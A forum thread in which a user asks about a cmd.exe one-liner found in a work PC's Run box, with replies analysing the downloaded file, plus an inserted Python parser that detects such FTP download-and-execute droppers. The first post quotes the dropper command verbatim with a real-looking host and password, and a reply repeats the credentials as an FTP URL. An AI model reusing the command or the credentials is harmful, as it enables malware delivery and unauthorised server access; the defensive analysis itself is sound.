3TeK Posted July 21, 2009
So I jumped on one of my computers at work today and went to Start > Run, and I see this in the run line:
cmd /c echo open ftp.r3kot.com 21 >> ik &echo user active@r3kot.com ;jwtc9lV?i{- >> ik &echo binary >> ik &echo get svhost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svhost.exe &exit
Anyone got any ideas what that did exactly? I figured it got hacked, so I wiped the computer and put Linux on there, lol.
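As an added example (not from the thread), here is a small Python parser that takes a cmd.exe one-liner of this shape, as it would appear in a RunMRU entry or a process-creation log, rebuilds the ftp script the echo lines write, and flags the download-then-execute pattern; the host, account and password in the sample are constructed placeholders, not the ones from the post.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample in the same shape as the one-liner found in the Run box.
SAMPLE = ('cmd /c echo open ftp.example.invalid 21 >> ik '
          '&echo user dropper@example.invalid S3cret-Pass >> ik '
          '&echo binary >> ik &echo get svhost.exe >> ik &echo bye >> ik '
          '&ftp -n -v -s:ik &del ik &svhost.exe &exit')

@dataclass
class FtpDropperFinding:
    script_file: Optional[str] = None            # file the echo lines append to
    script_lines: List[str] = field(default_factory=list)
    host: Optional[str] = None
    user: Optional[str] = None
    downloads: List[str] = field(default_factory=list)   # names from `get`
    executed: List[str] = field(default_factory=list)    # run after ftp
    deleted_script: bool = False                 # `del <script>` seen
    suspicious: bool = False

ECHO_RE = re.compile(r'^echo\s+(.*?)\s*>>\s*(\S+)$', re.IGNORECASE)
FTP_RE = re.compile(r'^ftp\b.*?-s:(\S+)', re.IGNORECASE)

def analyze_cmdline(cmdline: str) -> FtpDropperFinding:
    """Split a cmd.exe one-liner on '&' and rebuild the ftp -s script it creates."""
    f = FtpDropperFinding()
    body = re.sub(r'^\s*cmd(?:\.exe)?\s+/c\s+', '', cmdline, flags=re.IGNORECASE)
    seen_ftp = False
    for part in (p.strip() for p in body.split('&')):
        if not part:
            continue
        m = ECHO_RE.match(part)
        if m and not seen_ftp:               # lines being appended to the script
            f.script_lines.append(m.group(1))
            f.script_file = m.group(2)
            continue
        if FTP_RE.match(part):               # ftp driven non-interactively by the script
            seen_ftp = True
            continue
        if seen_ftp:                         # anything after ftp is the payload stage
            tokens = part.split()
            if tokens[0].lower() == 'del' and tokens[1:] == [f.script_file]:
                f.deleted_script = True
            elif tokens[0].lower() != 'exit':
                f.executed.append(tokens[0])
    for line in f.script_lines:              # interpret the reconstructed ftp script
        tokens = line.split()
        verb = tokens[0].lower() if tokens else ''
        if verb == 'open' and len(tokens) > 1:
            f.host = tokens[1]
        elif verb == 'user' and len(tokens) > 1:
            f.user = tokens[1]
        elif verb == 'get' and len(tokens) > 1:
            f.downloads.append(tokens[-1])   # local name is what gets run
    f.suspicious = bool(f.downloads) and any(x in f.downloads for x in f.executed)
    return f
```

`analyze_cmdline(SAMPLE)` reports the script file `ik`, the host and account used, that `svhost.exe` was fetched and then executed, and that the script was deleted afterwards.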
Sparda Posted July 21, 2009
ftp://active@r3kot.com@ftp.r3kot.com/ password is: ;jwtc9lV?i{- and it downloads svchost.exe. According to VirusTotal a number of antivirus engines spot it as something bad. You can change stuff on that ftp site... fun. http://www.virustotal.com/analisis/abb4c43...ea51-1248202364
digip Posted July 21, 2009
Whoever it was, was dumb enough to not erase their tracks if they did it from the run prompt. I'm sure it can be narrowed down to specific people at your work. Also, the fact that they were downloading malware means they intended to do something to your company; you should bring it to the attention of your boss as well as security (if you have any) and make sure they know it wasn't you who did it, since it was on the machine you sit at, you could be blamed for it! Just scanned it at VT, and it found nothing: http://www.virustotal.com/analisis/c12911d...1893-1247962693 Maybe changed the file from the one Sparda grabbed. Inspecting it more, it looks like a packed Firefox with changed icons to look like a Microsoft installer, but that could be someone trying to make it look like something else. This is what I see in the file: http://www.twistedpairrecords.com/digip/svchost-ftp.jpg And Google returns similar results for Firefox installers: http://www.google.com/search?hl=en&q=f...G=Google+Search
edit: The MD5 hash confirms it is Firefox saved as svchost.exe: 0d39ccd077bc5fec7fccf063a6bc0e9b ./win32/en-GB/Firefox Setup 3.5.1.exe http://releases.mozilla.org/pub/mozilla.or...est-3.5/MD5SUMS
3TeK (Author) Posted July 21, 2009
Thanks for all the info, I really appreciate the help. It's a computer at our data center that one of the other guys uses, and my office is across the street, so I'm hardly ever there. Plus I'm smarter than that to leave the command line there, lol.